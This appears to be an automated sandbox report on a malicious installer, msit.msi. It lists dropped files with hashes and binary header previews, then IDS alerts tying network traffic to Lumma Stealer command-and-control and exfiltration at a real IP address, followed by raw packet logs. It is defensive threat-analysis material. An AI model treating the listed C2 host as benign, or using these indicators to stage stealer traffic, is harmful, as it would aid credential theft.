                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):942
                                                                                                    Entropy (8bit):5.3743474005382765
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:r6BMV8TvbPQjnu65SYRouKLjWZpURoOYDhiSKzao7i0l:Wi6oVBiLjeS7YD8SKzasX
                                                                                                    MD5:95F0D09B8E996DF6C1D095A2E6872F67
                                                                                                    SHA1:C12CB94FADD56FECB351647D0EC88A56471EB5C7
                                                                                                    SHA-256:169C4A86C9916069F6D104890A14F80D6D48155D5183BEC64943EAB3D96EBAB4
                                                                                                    SHA-512:1E62FA06515786B94573D1A9F8F56EE82EAF79BB4E454CA6D38E1CB0F281831434CB17CCE680D8DE0FBE6A3D253DCAC69B53EF813EC6FF78BD761EAEE1687F24
                                                                                                    Malicious:false
                                                                                                    Preview:...@IXOS.@.....@..-Z.@.....@.....@.....@.....@.....@......&.{15630F35-AF86-45E7-B3CF-07A0AC07CAF6}..msit..msit.msi.@.....@.....@.....@........&.{BA748999-88DC-472F-9632-A6EFC559C1F2}.....@.....@.....@.....@.......@.....@.....@.......@......msit......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{86FA086C-1DD0-4082-AC92-FB7682CD7E34}!.C:\Program Files (x86)\msit\msit\.@.......@.....@.....@......&.{78C5261A-F04A-4AA9-A391-7F6716DBC52E}..02:\Software\msit\msit\Version.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".!.C:\Program Files (x86)\msit\msit\.@........WriteRegistryValues..Writing system registry values..Key: [1], Name: [2], Value: [3]...@.....@.....@.3..$..@......Software\msit\msit...@....%...Version..1.0.0%...Path!.C:\Program Files (x86)\msit\msit\...@.....@.....@."..
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13084160
                                                                                                    Entropy (8bit):7.767097954057833
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:196608:hL1kxR9F9KENR9N4bQOZNxVs0eb+CwRVu4fpbr7vOSPFjytXwt4TPnqunXcHF91v:uF3zv8Zrqb+CUuubX26jytnTPjnXcBv
                                                                                                    MD5:4D82074854750FDBA89D76624CC1E6F6
                                                                                                    SHA1:1CAB8150956317418F64E67692072CAC8472B75B
                                                                                                    SHA-256:019CF1AAD1F8D4F1B5DAE3AA609B2B53CFFC3C7894B58B9F0B225868AED7342D
                                                                                                    SHA-512:068BD8C1DB17C4DEF612618D463239F002E8F4712691A8FC9163215BDAA7BC5306AA861C396438C647E7B839C2C67C5709B25E0695E1BAA668AA100310255F9D
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 63%
                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....[g.........."................X].........@.............................0......g.....`..................................................n..(................2.......................................... e..(......@............q...............................text............................... ..`.rdata............................@..@.data....I....... ..................@....pdata...2.......4..................@..@.fptable.....P......................@....tls.........`......................@..._RDATA.......p......................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                    Category:dropped
                                                                                                    Size (bytes):20480
                                                                                                    Entropy (8bit):1.16232893070391
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:JSbX72FjNAGiLIlHVRpzh/7777777777777777777777777vDHF/Y856bQp01l0G:J7QI538j8F
                                                                                                    MD5:A037DDE7434A714359AC91D9BCBB73B5
                                                                                                    SHA1:E6E54D34CFFD15F2DFC25F6591BC72815C881CFF
                                                                                                    SHA-256:D849B3C722764CD734D828C79C7E5DD345ACF93C1F2E5CBB1BF66B544AD252A4
                                                                                                    SHA-512:D19AA5CF4994574303D847293D150A79579708B4821EC255B3A75B9D3D35E5225AD202680FD4D24644C23A0CD9806EBBDC79F41ACED29064DCDA61FA27B1FB8B
                                                                                                    Malicious:false
                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                    Category:dropped
                                                                                                    Size (bytes):20480
                                                                                                    Entropy (8bit):1.5716020855141486
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:i8PhUuRc06WXJeFT5dAdpSkdHAEkrCynGrVM+dpSkdTTd:NhU11FTDyGRCoGv/
                                                                                                    MD5:B8FA65AFB5DDD7B61D99D622083560F6
                                                                                                    SHA1:C0186F4D5593EA35936EA89F02E0F6C5D029065D
                                                                                                    SHA-256:E1AF8E80FC2E2204C1C65B928357147E99D7D1B9E9E14892D9A656B035CDE3B9
                                                                                                    SHA-512:1A55EFDE09A5282D2C48D8B17C58BB88334C6104650C78518275142C1E1E7AB524B15A11AD2E1B20B12CE484C18030F8E7458CE1E05D61E13F791DC56E50C0D1
                                                                                                    Malicious:false
                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):360000
                                                                                                    Entropy (8bit):5.362985130311034
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauR:zTtbmkExhMJCIpEG
                                                                                                    MD5:169A7E5B5C366E7E7CAEA92D4FAD1BEB
                                                                                                    SHA1:DB7730B83851555D0B4C4789C1CFBF2619E53D78
                                                                                                    SHA-256:43C02F9F7378BD3DCBF78D805A1B4ECC347BEAA38A1F20917E09AA4C325611A1
                                                                                                    SHA-512:A1B3D565430CB20B6B81A76B84F8876FF2F795726C31080CA13E2854CD255D1A64F147DFE5EC1C7F80D2C69DD3CE1C9B12EF023093E9A5A5698ED7E6F818BE5F
                                                                                                    Malicious:false
                                                                                                    Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32768
                                                                                                    Entropy (8bit):0.06852653289585642
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOIs8tkGMdUrMtIWstoVky6l0t/:2F0i8n0itFzDHF/Y856Dx01
                                                                                                    MD5:AD44AE53DB82B181D75735395EB7675B
                                                                                                    SHA1:982AC3B94AC655DA23D5CE07F497E07811DA3573
                                                                                                    SHA-256:E06F8146FBA0D47EF7DFDAFB25581B7EF264ABC21877F6502AEBC9826FD88FB2
                                                                                                    SHA-512:A8041CEDF88B53BF2436244A7C6B7F4E65361FF2418302E2C4B26E5E139FEECA6A3CEFF6B29F4F068A766AD269F0F1471F3EEFED9754939A5F9C9C9080B693C7
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                    Category:dropped
                                                                                                    Size (bytes):20480
                                                                                                    Entropy (8bit):1.5716020855141486
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:i8PhUuRc06WXJeFT5dAdpSkdHAEkrCynGrVM+dpSkdTTd:NhU11FTDyGRCoGv/
                                                                                                    MD5:B8FA65AFB5DDD7B61D99D622083560F6
                                                                                                    SHA1:C0186F4D5593EA35936EA89F02E0F6C5D029065D
                                                                                                    SHA-256:E1AF8E80FC2E2204C1C65B928357147E99D7D1B9E9E14892D9A656B035CDE3B9
                                                                                                    SHA-512:1A55EFDE09A5282D2C48D8B17C58BB88334C6104650C78518275142C1E1E7AB524B15A11AD2E1B20B12CE484C18030F8E7458CE1E05D61E13F791DC56E50C0D1
                                                                                                    Malicious:false
                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):512
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3::
                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                    Malicious:false
                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):512
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3::
                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                    Malicious:false
                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):73728
                                                                                                    Entropy (8bit):0.1389890362895574
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:PacTx+dpipV+dH+dpipV+dHAEV+/jCynG+leVgwGgItQH5MF+Q7:ScT4dpSkdedpSkdHAEkrCynGrVMF
                                                                                                    MD5:D874BAB7E21F879CBD088F9E81750CB9
                                                                                                    SHA1:50678FCA5BDA644ECD1674F13F847265A686A6CA
                                                                                                    SHA-256:91C2EFBDC9EEE6E892923C310F317E1A80EC006676E35E703AF7737F3840A122
                                                                                                    SHA-512:465B4DB51938E650A02DEF14CA8B6D7B917A24EA30131554A206C647D59B336D52947651EA37B4B832C1D41CAB93A50C9F0705D227A26A73E356FDF1CB450739
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32768
                                                                                                    Entropy (8bit):1.258678752436576
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:w9cuCDBO+CFXJfT5jAdpSkdHAEkrCynGrVM+dpSkdTTd:kchO3T9yGRCoGv/
                                                                                                    MD5:A9F28E83F5185D85C77B8B3289E4B618
                                                                                                    SHA1:8BB37DFA46D7A34AFE105445EFE799A775B7472B
                                                                                                    SHA-256:59BFC10F2F62CE56962116F84BA96AF775C95F8C1ED08D08DD8AD64DB996A92F
                                                                                                    SHA-512:ABD63B1F34977EBE0715ABD3B19424909D2950B2675B53907C374DE346FF530A4C8AFFA7C8AD2EB70B50C4C581AB02F8B2B52EE1222D7EB4EA6C7CA284FC4EC3
                                                                                                    Malicious:false
                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32768
                                                                                                    Entropy (8bit):1.258678752436576
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:w9cuCDBO+CFXJfT5jAdpSkdHAEkrCynGrVM+dpSkdTTd:kchO3T9yGRCoGv/
                                                                                                    MD5:A9F28E83F5185D85C77B8B3289E4B618
                                                                                                    SHA1:8BB37DFA46D7A34AFE105445EFE799A775B7472B
                                                                                                    SHA-256:59BFC10F2F62CE56962116F84BA96AF775C95F8C1ED08D08DD8AD64DB996A92F
                                                                                                    SHA-512:ABD63B1F34977EBE0715ABD3B19424909D2950B2675B53907C374DE346FF530A4C8AFFA7C8AD2EB70B50C4C581AB02F8B2B52EE1222D7EB4EA6C7CA284FC4EC3
                                                                                                    Malicious:false
                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):512
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3::
                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                    Malicious:false
                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                    Category:dropped
                                                                                                    Size (bytes):20480
                                                                                                    Entropy (8bit):1.5716020855141486
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:i8PhUuRc06WXJeFT5dAdpSkdHAEkrCynGrVM+dpSkdTTd:NhU11FTDyGRCoGv/
                                                                                                    MD5:B8FA65AFB5DDD7B61D99D622083560F6
                                                                                                    SHA1:C0186F4D5593EA35936EA89F02E0F6C5D029065D
                                                                                                    SHA-256:E1AF8E80FC2E2204C1C65B928357147E99D7D1B9E9E14892D9A656B035CDE3B9
                                                                                                    SHA-512:1A55EFDE09A5282D2C48D8B17C58BB88334C6104650C78518275142C1E1E7AB524B15A11AD2E1B20B12CE484C18030F8E7458CE1E05D61E13F791DC56E50C0D1
                                                                                                    Malicious:false
                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):512
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3::
                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                    Malicious:false
                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):512
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3::
                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                    Malicious:false
                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32768
                                                                                                    Entropy (8bit):1.258678752436576
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:w9cuCDBO+CFXJfT5jAdpSkdHAEkrCynGrVM+dpSkdTTd:kchO3T9yGRCoGv/
                                                                                                    MD5:A9F28E83F5185D85C77B8B3289E4B618
                                                                                                    SHA1:8BB37DFA46D7A34AFE105445EFE799A775B7472B
                                                                                                    SHA-256:59BFC10F2F62CE56962116F84BA96AF775C95F8C1ED08D08DD8AD64DB996A92F
                                                                                                    SHA-512:ABD63B1F34977EBE0715ABD3B19424909D2950B2675B53907C374DE346FF530A4C8AFFA7C8AD2EB70B50C4C581AB02F8B2B52EE1222D7EB4EA6C7CA284FC4EC3
                                                                                                    Malicious:false
                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {BA748999-88DC-472F-9632-A6EFC559C1F2}, Number of Words: 2, Subject: msit, Author: msit, Name of Creating Application: msit, Template: ;1033, Comments: This installer database contains the logic and data required to install msit., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Fri Dec 13 03:26:19 2024, Last Saved Time/Date: Fri Dec 13 03:26:19 2024, Last Printed: Fri Dec 13 03:26:19 2024, Number of Pages: 450
                                                                                                    Entropy (8bit):7.611938145565435
                                                                                                    TrID:
                                                                                                    • Windows SDK Setup Transform Script (63028/2) 47.91%
                                                                                                    • Microsoft Windows Installer (60509/1) 46.00%
                                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 6.09%
                                                                                                    File name:msit.msi
                                                                                                    File size:16'847'872 bytes
                                                                                                    MD5:18577f68754f3e2703cdca2df9ba65ff
                                                                                                    SHA1:8d8846470510b1b6f81c0725975c7c3589568bb3
                                                                                                    SHA256:413c17f73a0831d6ae209e491856a66e07e8c0af70e7e06f68a7b7570ccb3a95
                                                                                                    SHA512:eb238a258b0dfe40716c2a8bc847951abbac4e7224ecefcb13be559a63cc39e6645e406764991cb60b87aa082196b890ff78c3c25c659b851eb02c4064e8eaec
                                                                                                    SSDEEP:393216:LPF3zv8Zrqb+CUuubX26jytnTPjnXcBv9k2VvOTp:JzwqNUHytvnMd9Z
                                                                                                    TLSH:5907E1157EBFE5EDF17E0035861616338A3B6D990B3251FB72E266409E360D21FF2622
                                                                                                    File Content Preview:........................>...........................................1...........H.......p.......i..............................................................................................................................................................
                                                                                                    Icon Hash:2d2e3797b32b2b99
                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                    2025-01-13T08:29:11.533777+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649711172.67.134.197443TCP
                                                                                                    2025-01-13T08:29:12.199354+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649711172.67.134.197443TCP
                                                                                                    2025-01-13T08:29:12.199354+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649711172.67.134.197443TCP
                                                                                                    2025-01-13T08:29:12.760819+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649717172.67.134.197443TCP
                                                                                                    2025-01-13T08:29:13.263540+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649717172.67.134.197443TCP
                                                                                                    2025-01-13T08:29:13.263540+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649717172.67.134.197443TCP
                                                                                                    2025-01-13T08:29:13.982385+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649728172.67.134.197443TCP
                                                                                                    2025-01-13T08:29:15.144517+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649734172.67.134.197443TCP
                                                                                                    2025-01-13T08:29:16.338516+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649741172.67.134.197443TCP
                                                                                                    2025-01-13T08:29:16.950627+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649741172.67.134.197443TCP
                                                                                                    2025-01-13T08:29:18.004044+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649753172.67.134.197443TCP
                                                                                                    2025-01-13T08:29:19.579194+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649765172.67.134.197443TCP
                                                                                                    2025-01-13T08:29:21.624274+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649781172.67.134.197443TCP
                                                                                                    2025-01-13T08:29:21.949582+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649781172.67.134.197443TCP
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Jan 13, 2025 08:29:11.041421890 CET49711443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:11.041460991 CET44349711172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:11.041531086 CET49711443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:11.046165943 CET49711443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:11.046181917 CET44349711172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:11.533688068 CET44349711172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:11.533776999 CET49711443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:11.735208035 CET49711443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:11.735235929 CET44349711172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:11.736233950 CET44349711172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:11.784421921 CET49711443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:11.796814919 CET49711443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:11.796838045 CET49711443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:11.796921015 CET44349711172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:12.199331045 CET44349711172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:12.199440002 CET44349711172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:12.199493885 CET49711443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:12.201241016 CET49711443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:12.201252937 CET44349711172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:12.201292992 CET49711443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:12.201297998 CET44349711172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:12.267920971 CET49717443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:12.268013000 CET44349717172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:12.268105030 CET49717443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:12.268419981 CET49717443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:12.268450975 CET44349717172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:12.760734081 CET44349717172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:12.760818958 CET49717443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:12.762113094 CET49717443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:12.762126923 CET44349717172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:12.762916088 CET44349717172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:12.764091015 CET49717443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:12.764108896 CET49717443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:12.764173985 CET44349717172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:13.263602018 CET44349717172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:13.263734102 CET44349717172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:13.263798952 CET49717443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:13.263829947 CET44349717172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:13.263907909 CET44349717172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:13.263963938 CET49717443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:13.263972044 CET44349717172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:13.264054060 CET44349717172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:13.264136076 CET44349717172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:13.264175892 CET49717443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:13.264183044 CET44349717172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:13.264245987 CET49717443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:13.264251947 CET44349717172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:13.264389992 CET44349717172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:13.264439106 CET49717443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:13.264445066 CET44349717172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:13.268271923 CET44349717172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:13.268349886 CET49717443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:13.268362045 CET44349717172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:13.315679073 CET49717443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:13.355529070 CET44349717172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:13.355628014 CET44349717172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:13.355688095 CET44349717172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:13.355722904 CET49717443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:13.355750084 CET44349717172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:13.355792999 CET49717443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:13.355803967 CET44349717172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:13.355818033 CET44349717172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:13.355855942 CET49717443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:13.356070995 CET49717443192.168.2.6172.67.134.197
                                                                                                    Jan 13, 2025 08:29:13.356086969 CET44349717172.67.134.197192.168.2.6
                                                                                                    Jan 13, 2025 08:29:13.356101036 CET49717443192.168.2.6172.67.134.197
